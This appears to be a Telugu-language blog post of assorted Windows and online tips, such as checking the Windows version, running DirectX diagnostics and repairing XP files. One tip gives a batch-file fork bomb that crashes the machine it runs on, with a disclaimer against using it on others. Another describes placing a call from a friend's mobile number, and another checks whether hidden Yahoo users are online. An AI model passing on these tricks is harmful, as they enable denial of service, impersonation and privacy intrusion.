Windows version గురించి తెలుసుకోటానికి…
Start->Run->winver అని టైప్ చేయ్యండి.
yahoo acoount ని Delete చేయటానికి…
ఈ లింక్ ని click చేసి sign in అవ్వండి.
ఇక్కడ Password type చేసి Code ని type చేసి yes click చేయ్యండి.
మీ video card errors ని Chek చేయటానికి…
Start->Run->Dxdiag అని టైప్ చేయ్యండి.
Display tab లో ” Test Direct Draw ” and ” Test Direct 3D ” ఒక దాని తరువాత ఇంకొదాన్ని click చేయ్యండి.
మీకు వచ్చినా Messeges లో yes or No ఏదో ఒక దాన్ని click చేయ్యండి.
కింద Notes అనే tab లో ఎమైనా errors ఉంటే చూపిస్తాయి.లేదా No problems found అని వస్తుంది.
మీ System Total Information కోసం…
HWinfo అనే ఈ software తో మీ computer కి సంబందించిన పూర్తి information తెలుసుకోవచ్చు.
Boot Time లో Windows logo ని Hide చేయటానికి…
1. Start->Run-> msconfig అని టైప్ చేయ్యండి.
2.BOOT.INI Tab లో NOGUIBOOT ని Click చేయ్యండి.
తరువాత ok ని click చేయ్యండి.
మీ పేరు టాటూగా మార్చుకోవచ్చు…
http://www.imagechef.com ఈ సైట్ చూడండి.
auto play Option పని చేయకుండా ఉండటానికి…
1.Start->Run->GPEDIT.MSC
2.Configuration-> Administrative Templates->System->turn off auto play ని Desable చేయ్యండి.
Computer ని online లో Repair చేసుకోటానికి…
Computer Repair చేసుకోటానికి ఉపయోగపడే Tips ఈ సైట్ లో ఉన్నాయి.
yahoo avtar ని save చేయటానికి…
http://detectinvisible.com/ ఈ సైట్ లోకి వెళ్ళి ID ఇస్తే Avtar Save చేసుకోవచ్చు. ఇంకా వాళ్ళు online ఉంది లేనిది కూడా తెలుసుకోవచ్చు.
Invisible Yahoo Id కోసం…
మనం Chat rooms లోకి వెళ్ళినప్పుడు కొన్ని Id names కనపడవు గమనించరా!
ఇలా మీ ID కూడా కనిపించకుండా ఇలా చేయ్యండి.
Yahoo! Messenger » Messenger » My Profiles » Create/Edit My Profiles లోకి వెళ్ళండి.
ఇక్కడ Nick name లో Alt press చేసి 255 ని press చేయ్యండి.
gmail లో fast గా login అవ్వటానికి…
http://mail.google.com/mail/h/ ఈ లింక్ ద్వారా fast గా login అవ్వవచ్చు.
ఈ లింక్ ద్వారా http://m.gmail.com మీ net speed తక్కువగా ఉన్న fast గా login అవ్వవచ్చు.
మీ ఫ్రెండ్ mobile no నుంచి మీ ఫ్రెండ్ కి call చేయ్యండి…
1. http:// www. mobivox. com ఈ సైట్ లోకి వెళ్ళి Register అవ్వండి.
2.registration time లో మీ ఫ్రెండ్ Mobile no ని ఇవ్వండి.
3.మీరు ఇచ్చినా Mail ID కి వచ్చినా Mail ని confirm చేసుకొండి.
4.మీ Account లోకి login అవ్వండి.
5.అందులో ”Direct WebCall” ని click చేయ్యండి.
6.వచ్చినా Window లో Country & mobile ని select చేసుకొండి.(మీ Mobile no కూడా ఇవ్వవచ్చు.)
7.”Call Now” ని క్లిక్ చేయ్యండి.
Computer crash చేయటానికి…
1.Notepad open చేసి ఈ Code అందులో paste చేయ్యండి.
@ECHO OFF
:loop
start cmd.exe
goto loop
2.దీనిని test.bat అనే name తో save చేయ్యండి.
3.దీనిని open చేస్తే computer crash అయిపోతుంది.
Note:ఇది మీ knowledge కోసం మాత్రమే. దీనిని వేరే వాళ్ళ computer పై ప్రయోగించకండి.
Xp లో files corrupt అయితే…
1. Xp CD ని CD/DVD Drive లో ఉంచాండి.
2.Start->Run-> cmd అని టైప్ చేయ్యండి.
3.command prompt లో sfc /scannow అని టైప్ చేయ్యండి.
No comments:
Post a Comment